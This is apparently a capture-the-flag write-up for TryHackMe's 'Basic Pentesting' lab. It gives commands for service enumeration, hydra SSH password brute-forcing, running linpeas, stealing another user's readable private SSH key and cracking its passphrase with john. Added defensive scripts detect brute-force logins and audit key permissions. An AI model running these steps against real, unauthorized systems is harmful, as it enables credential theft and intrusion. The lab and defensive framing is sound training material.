
# Basic Pentesting

Try this challenge in [TryHackMe: **Basic Pentesting**](https://tryhackme.com/r/room/basicpentestingjt)

> In doing this challenge, I learned the following skills and tools:
>
> * **brute forcing** - using <mark style="color:orange;">**hydra**</mark>
> * **hash cracking** - using <mark style="color:orange;">**ssh2john**</mark>, <mark style="color:orange;">**john**</mark>
> * **service enumeration** - using <mark style="color:orange;">**nmap**</mark>, <mark style="color:orange;">**gobuster**</mark>
> * **Linux enumeration** - using <mark style="color:orange;">**enum4linux**</mark>, <mark style="color:orange;">**linpeas**</mark>

## Web App Testing and Privilege Escalation

### Find the services exposed by the machine

Run <mark style="color:orange;">**nmap**</mark> with default scripts and version detection, and save the output in the `basicpentest` directory:

{% code lineNumbers="true" %}

```bash
mkdir basicpentest
nmap -sC -sV 10.10.X.X -oN basicpentest/initial
```

{% endcode %}

{% hint style="info" %}
Replace **`10.10.X.X`** with the IP address assigned to your target machine.
{% endhint %}

<figure><img src="/files/VKFQD16YLgaz0smswpqI" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/SOMtgDHyScaxMTgnQLjZ" alt="" width="563"><figcaption></figcaption></figure>

Check it in the browser: **`http://10.10.X.X`**

<figure><img src="/files/INop3kcNsnSaiUA38enJ" alt="" width="563"><figcaption></figcaption></figure>

Try **`View Page Source`**. There is a note in green there to <mark style="color:green;">**check their dev note section**</mark>.

<figure><img src="/files/sMUT4k7UitTpVJosFOze" alt="" width="563"><figcaption></figcaption></figure>

So let's check if there is a **`/dev`** directory.

<figure><img src="/files/KRhjDoDZ1npUfiBx9ZwG" alt="" width="563"><figcaption></figcaption></figure>

We get **Not Found** responses for both paths we tried, but the error pages themselves disclose the server software and version, which is worth noting.

{% hint style="info" %}
**Apache/2.4.18 (Ubuntu) Server at 10.10.X.X Port 80**
{% endhint %}

### What is the name of the hidden directory on the web server (enter name without /)?

Using <mark style="color:orange;">**gobuster**</mark>, let's find out which directories exist on the web server.

{% code overflow="wrap" %}

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.X.X
```

{% endcode %}

<figure><img src="/files/HKN2nyk2e0vtntVzEJIh" alt="" width="563"><figcaption></figcaption></figure>

Even before the scan finishes, gobuster reports the directory **`/development`**.

When we access the directory, we'll see two text files, **`dev.txt`** and **`j.txt`**. Let's open both.

<figure><img src="/files/MijqQCZvofGxLCDjR80B" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/vX9hfzMoirAO47sgWxBv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VJKWD5RrDk76wiYi2RZ4" alt=""><figcaption></figcaption></figure>

### User brute-forcing to find the username & password

We found the users `jan` and `kay` via <mark style="color:orange;">**enum4linux**</mark>, saving the output to a log file with `tee`:

```bash
/usr/bin/enum4linux -a 10.10.X.X | tee enum4linux.log
```

<figure><img src="/files/mzD0f3qm0V4bn56KuBPO" alt="" width="563"><figcaption></figcaption></figure>

Using <mark style="color:orange;">**hydra**</mark> against the SSH service with the `rockyou.txt` wordlist, we recover jan's password:

```bash
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.X.X
```

<figure><img src="/files/YC9nF3yqyaFnUOUV75SU" alt="" width="563"><figcaption></figcaption></figure>
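From the target's side, a hydra run like the one above shows up as a burst of failed SSH logins from one source, usually followed by a success. The following is an added example (not part of the original write-up) that reports such sources from constructed `auth.log`-style lines; the log file, IP addresses and threshold are assumptions:

```shell
#!/bin/sh
# Added example (not from the original write-up): flag SSH password-guessing
# sources in an OpenSSH auth log, which is what a hydra run looks like to sshd.

# Constructed sample log lines in Ubuntu /var/log/auth.log format.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
Mar  1 10:00:01 target sshd[1201]: Failed password for jan from 10.10.9.9 port 41000 ssh2
Mar  1 10:00:01 target sshd[1202]: Failed password for jan from 10.10.9.9 port 41001 ssh2
Mar  1 10:00:02 target sshd[1203]: Failed password for jan from 10.10.9.9 port 41002 ssh2
Mar  1 10:00:02 target sshd[1204]: Failed password for invalid user admin from 10.10.9.9 port 41003 ssh2
Mar  1 10:00:03 target sshd[1205]: Failed password for jan from 10.10.9.9 port 41004 ssh2
Mar  1 10:00:04 target sshd[1206]: Accepted password for jan from 10.10.9.9 port 41005 ssh2
Mar  1 10:05:10 target sshd[1300]: Failed password for kay from 10.10.7.7 port 52000 ssh2
Mar  1 10:06:00 target sshd[1301]: Accepted publickey for kay from 10.10.7.7 port 52001 ssh2
EOF

# Print "ip count" for every source with at least <threshold> failed password
# attempts. The source address is the field after the word "from".
# Usage: failed_logins_by_ip <logfile> <threshold>
failed_logins_by_ip() {
    awk -v limit="$2" '
        /sshd.*Failed password for/ {
            ip = ""
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            if (ip != "") fails[ip]++
        }
        END { for (ip in fails) if (fails[ip] >= limit) print ip, fails[ip] }
    ' "$1" | sort
}

# A failure burst followed by a password success from the same source is the
# classic signature of a guessed password; report those sources too.
# Usage: success_after_failures <logfile> <threshold>
success_after_failures() {
    awk -v limit="$2" '
        /sshd.*Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i + 1)]++
        }
        /sshd.*Accepted password for/ {
            ip = ""
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            if (ip != "" && fails[ip] >= limit) print ip
        }
    ' "$1" | sort -u
}

failed_logins_by_ip "$SAMPLE_LOG" 3      # prints: 10.10.9.9 5
success_after_failures "$SAMPLE_LOG" 3   # prints: 10.10.9.9
```

On a real host, point the functions at `/var/log/auth.log` (or `journalctl -u ssh` output) and pick a threshold that suits the login volume.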

Now that we know jan's credentials, we use them to log in via SSH.

Check the folders we can reach and see if there are any interesting files.

<figure><img src="/files/TVJg2GMfo54FDv1gUJsV" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/jaC8KR04v9LvTmMqAzWf" alt="" width="563"><figcaption></figcaption></figure>

Since most actions led to permission denied errors, we ran <mark style="color:orange;">**linpeas**</mark> on the machine to check for possible privilege escalation methods.

To copy `linpeas.sh` to the `/tmp` directory on the target machine:

```bash
scp linpeas.sh jan@10.10.X.X:/tmp
```

<figure><img src="/files/FfdIhdt31dzlGoBJaMdJ" alt="" width="563"><figcaption></figcaption></figure>

Check that the linpeas file was transferred successfully.

<figure><img src="/files/SLGE41AxPjTD7lCOdIbT" alt="" width="563"><figcaption></figcaption></figure>

Make linpeas executable:

```bash
chmod +x linpeas.sh
```

Then execute linpeas:

```bash
./linpeas.sh
```

From the linpeas results, we found a private SSH key at `/home/kay/.ssh/id_rsa` that is readable by our current user, jan.

<figure><img src="/files/3YjTj1oFHn7DNRnYNo3c" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/sz4a2ZFD7ApBb7ochwVZ" alt="" width="563"><figcaption></figcaption></figure>
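The finding above is a permissions problem: another local user could read kay's private key. The following is an added audit example (not part of the original write-up or of linpeas) that lists private keys readable by group or others under a home root and tightens one; the sample home tree it builds is constructed and the file names are assumptions:

```shell
#!/bin/sh
# Added example (not from the original write-up or linpeas): audit for
# private SSH keys that other local users can read, the weakness that exposed
# /home/kay/.ssh/id_rsa on this box.

# Constructed sample home tree: "good" keeps its key private, "kay" does not.
SAMPLE_HOME=$(mktemp -d)
mkdir -p "$SAMPLE_HOME/good/.ssh" "$SAMPLE_HOME/kay/.ssh"
printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'constructed-placeholder' \
    '-----END OPENSSH PRIVATE KEY-----' > "$SAMPLE_HOME/good/.ssh/id_rsa"
cp "$SAMPLE_HOME/good/.ssh/id_rsa" "$SAMPLE_HOME/kay/.ssh/id_rsa"
chmod 700 "$SAMPLE_HOME/good" "$SAMPLE_HOME/good/.ssh"
chmod 600 "$SAMPLE_HOME/good/.ssh/id_rsa"
chmod 755 "$SAMPLE_HOME/kay" "$SAMPLE_HOME/kay/.ssh"
chmod 644 "$SAMPLE_HOME/kay/.ssh/id_rsa"        # readable by every local user

# List private key files under <home_root> whose mode grants group or other
# read access. Matching on the PEM header catches keys under any file name.
# Usage: readable_private_keys <home_root>
readable_private_keys() {
    find "$1" -type f \( -perm -040 -o -perm -004 \) \
        -exec grep -l -- '-----BEGIN .*PRIVATE KEY-----' {} + 2>/dev/null | sort
}

# Apply the permissions the ssh client requires before it will use a key:
# 600 on the key file and 700 on the enclosing .ssh directory.
# Usage: lock_down_key <key_file>
lock_down_key() {
    chmod 600 "$1" && chmod 700 "$(dirname "$1")"
}

readable_private_keys "$SAMPLE_HOME"   # prints: $SAMPLE_HOME/kay/.ssh/id_rsa
```

Run `readable_private_keys /home` as root on a real host; keys only readable by their owner are not reported, so an empty result is the goal.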

Open the `id_rsa` file and copy its contents:

```bash
cat id_rsa
```

<figure><img src="/files/33rE7gZDw54IFVXHsOKl" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/v5Kmz92zeT4DuiodRbFl" alt="" width="563"><figcaption></figcaption></figure>

On your Kali machine, paste the contents into a file named `kay_id_rsa`:

```bash
nano kay_id_rsa
```

<figure><img src="/files/HD1RgjO0vj1K5wHcpFAs" alt="" width="563"><figcaption></figcaption></figure>

Change the permissions of the file so it is readable and writable only by you; the ssh client refuses to use a private key with looser permissions:

```bash
chmod 600 kay_id_rsa
```

Try logging in to the machine as kay using the copied `id_rsa` key:

```bash
ssh -i kay_id_rsa kay@10.10.X.X
```

<figure><img src="/files/MQx4ZSWU7ozdwJ2aAF6b" alt="" width="563"><figcaption></figcaption></figure>

We find that a passphrase is needed to use this key.

To recover the passphrase for kay's `id_rsa`, we used <mark style="color:orange;">**ssh2john**</mark> from the John the Ripper suite to convert the key into a crackable hash:

```bash
ssh2john ~/kay_id_rsa
```

<figure><img src="/files/UKS6XOO5IYFIrBFQeoUU" alt="" width="563"><figcaption></figcaption></figure>

We need to save this hash in a text file so it can be cracked with <mark style="color:orange;">**john**</mark>:

```bash
ssh2john ~/kay_id_rsa > ~/kay_id_rsa_john.txt
```

<figure><img src="/files/FcBi546nHntsmj2L0Yli" alt="" width="563"><figcaption></figcaption></figure>

Using john with a wordlist, we cracked the hash and recovered the passphrase.

<figure><img src="/files/t7Gm1zCP2yTMKDlgzAPq" alt="" width="563"><figcaption></figcaption></figure>

We can now log in as kay using the key and the recovered passphrase:

```bash
ssh -i kay_id_rsa kay@10.10.X.X
```

{% hint style="success" %}
Opening the **pass.bak** file reveals the final password.
{% endhint %}

<figure><img src="/files/zZ9HTGwpIu0m1RsVqj2N" alt=""><figcaption></figcaption></figure>
